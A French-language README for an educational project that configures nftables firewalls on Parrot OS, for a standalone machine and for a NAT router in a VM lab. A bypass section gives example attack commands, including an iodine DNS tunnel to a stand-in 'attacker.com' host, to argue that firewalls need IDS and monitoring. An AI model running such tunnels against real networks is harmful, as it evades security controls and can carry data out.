© 2025 virg736 - Tous droits réservés. Reproduction interdite sans autorisation.
📸 Image protégée - Propriété exclusive
- Introduction
- Pourquoi Parrot OS ?
- Niveau 6 : Pare-feu personnel
- Niveau 7 : Pare-feu réseau
- Explications
- Limites et bonnes pratiques
- Comment un hacker pourrait contourner
- Exemple : tunnel dns
- Différences entre les niveaux 6 et 7
- Conclusion
- Technologies utilisées
- Licence
- À propos de l’usage
- Droits sur les visuels
- Auteur
Ce projet présente la configuration de pare-feux avancés sous Parrot Security OS, une distribution orientée pentest et protection de la vie privée/anonymat.
Les démonstrations portent sur les niveaux suivants :
- Niveau 6 - nftables (avancé, machine seule)
- Niveau 7 - nftables (NAT/Lab, routeur pour un lab de VM)
- Distribution orientée pentest et vie privée/anonymat.
- Intègre des outils de confidentialité (Tor, Anonsurf, OnionShare).
- Plus légère que Kali, adaptée aux machines modestes ou la virtualisation (VirtualBox, VMware).
- UFW préinstallé mais désactivé → l’utilisateur garde le contrôle → L’utilisateur doit l'active et le configurer manuellement.
Exemple de configuration nftables pour une machine isolée (standalone).
Exemple de configuration nftables en mode routeur (NAT) pour un lab de VM.
- Niveau 6 → protège spécifiquement ta machine personnelle.
- Niveau 7 → transforme ta machine en pare-feu et routeur pour un réseau virtuel.
➡️ Application des règles : mise en place et exécution des règles de filtrage via nftables afin de contrôler le trafic réseau (entrées, sorties, redirections).
Un pare-feu réduit la surface d’attaque, mais il ne protège pas de tout. Un attaquant expérimenté peut toujours tenter de :
- Passer par un service autorisé (ex : SSH, HTTPS).
- Exploiter une faille au niveau applicatif.
- Utiliser du tunneling (DNS, HTTPS).
- Contourner via IPv6 si celui-ci est mal configuré.
👉 Conclusion : Un firewall seul n’est pas suffisant. Il doit être combiné avec :
- un IDS/IPS (Snort, Suricata),
- du monitoring (logs, SIEM),
- et des bonnes pratiques : MFA, mises à jour régulières, segmentation réseau, durcissement système.
Même avec un firewall avancé (niveaux 6 et 7), il existe des techniques de contournement :
-
🔓 Exploiter les ports ouverts (ex :
nmap -p 443 <cible>➝ scanner en HTTPS). -
Tunneling DNS (ex :
iodine➝ transformer DNS en canal de communication). -
Exploiter des failles applicatives derrière un port autorisé.
👉 C’est pourquoi un pare-feu seul ne suffit pas : il doit être complété par un IDS/IPS et monitoring.
Comme le port 53 (DNS) est ouvert, un attaquant peut établir un tunnel DNS :
iodine -f -r attacker.com
- Protège uniquement ta machine locale.
- Politique stricte : tout le trafic est bloqué, à l'exception de quelques services essentiels.
- Idéal pour un poste de travail ou un serveur isolé.
👉 Exemple : ton PC sous Parrot OS n’accepte que le trafic web et SSH.
- Ta machine devient un routeur + firewall.
- Protèger un réseau interne entier.
- Ajouter le forwarding et NAT.
Parrot OS constitue une alternative solide à Kali Linux : alliant légèreté et outils de sécurité avancés, orientée vers la protection de la vie privée et adaptée aux environnements pentest.
Les niveaux 6 et 7 illustrent deux cas concrets :
Protection avancée d’une machine individuelle (standalone) Mise en place d’un routeur/firewall complet pour un lab réseau.
👉 Ce projet montre comment un firewall peut évoluer : d’une simple protection locale ➝ vers un composant réseau avancé.
- Parrot OS
- nftables
- VirtualBox
✍️ Auteur : Virginie Lechene
Le script est publié sous la licence MIT.
Ce projet est destiné exclusivement à des fins pédagogiques, notamment dans le cadre de :
- d’une formation en cybersécurité,
- de tests d’intrusion légaux (pentest),
- d’analyses réseau dans un environnement contrôlé.
Les visuels, illustrations ou captures présents dans ce dépôt sont la propriété exclusive de l’auteure. Toute reproduction ou utilisation non autorisée est interdite.